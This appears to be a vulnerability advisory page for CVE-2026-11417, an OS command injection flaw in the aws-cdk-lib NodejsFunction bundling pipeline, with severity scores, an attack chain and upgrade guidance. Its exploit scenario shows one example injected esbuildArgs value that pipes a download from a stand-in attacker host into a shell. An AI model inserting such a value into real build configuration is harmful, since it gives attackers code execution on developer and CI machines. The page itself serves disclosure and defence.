Skip to main content

AWS CDK CVE-2026-11417

| EUVD-2026-36076 HIGH
OS Command Injection (CWE-78)
2026-06-10 AMZN GHSA-999r-qq7v-r334
Command Injection Microsoft Aws Cloud Development Kit Library
7.0
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
7.0 HIGH
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
A
Scope
X

Lifecycle Timeline

4
Source Code Evidence Fetched
Jun 10, 2026 - 18:50 vuln.today
Analysis Generated
Jun 10, 2026 - 18:50 vuln.today
CVSS changed
Jun 10, 2026 - 18:22 NVD
7.3 (HIGH) 7.0 (HIGH)
CVE Published
Jun 10, 2026 - 17:39 nvd
HIGH 7.0

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 npm packages depend on aws-cdk-lib (1 direct, 0 indirect)

Ecosystem-wide dependent count for version 2.246.0.

DescriptionCVE.org

OS command injection in the NodejsFunction local bundling pipeline in aws-cdk-lib before 2.245.0 (2.246.0 on Windows) might allow an actor who controls the value of one or more bundling properties (externalModules, define, loader, inject, or esbuildArgs) to execute arbitrary commands on the host running the CDK toolchain via injected shell metacharacters. This issue requires the threat actor to control the value of one or more of the affected bundling properties in the CDK application.

To remediate this issue, users should upgrade to aws-cdk-lib 2.245.0 (2.246.0 on Windows) or later.

AnalysisAI

OS command injection in the NodejsFunction local bundling pipeline of aws-cdk-lib prior to 2.245.0 (2.246.0 on Windows) allows an actor controlling bundling property values (externalModules, define, loader, inject, or esbuildArgs) to execute arbitrary commands on the host running the CDK toolchain via shell metacharacter injection. The flaw, reported by Amazon and tracked under GHSA-999r-qq7v-r334, affects developer and CI/CD machines synthesizing CDK applications. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain write access to CDK source or dependency
Delivery
Inject shell metacharacters into bundling property
Exploit
Victim runs cdk synth/deploy
Execution
NodejsFunction invokes esbuild via shell
Persist
Injected command executes on build host
Impact
Steal cloud credentials and pivot
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The attacker must control the value of at least one of these specific NodejsFunction bundling properties: externalModules, define, loader, inject, or esbuildArgs - typically achieved via a malicious dependency, compromised CDK construct, untrusted configuration source, or insider commit. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 4.0 score is 7.0 with vector AV:L/AC:L/AT:N/PR:L/UI:A - local attack vector, low complexity, low privileges required, and active user interaction needed, yielding high confidentiality, integrity, and availability impact on the vulnerable system but no scope change. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A contributor or upstream dependency introduces a CDK construct or configuration that sets esbuildArgs to a value such as `--foo=bar; curl attacker.example/x | sh`, then the victim developer or CI pipeline runs `cdk synth` on the project. The NodejsFunction bundling pipeline interpolates the attacker-controlled value into a shell invocation of esbuild, causing the injected command to execute on the build host with the privileges of the CDK toolchain - typically yielding access to cloud deployment credentials and source code. …
Remediation Vendor-released patch: upgrade aws-cdk-lib to 2.245.0 or later on Linux/macOS and to 2.246.0 or later on Windows, as referenced in https://github.com/aws/aws-cdk/releases/tag/v2.245.0 and the AWS security bulletin https://aws.amazon.com/security/security-bulletins/2026-041-aws/. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Audit all aws-cdk-lib deployments to identify affected versions (< 2.245.0 on Linux/macOS, < 2.246.0 on Windows). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11417 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy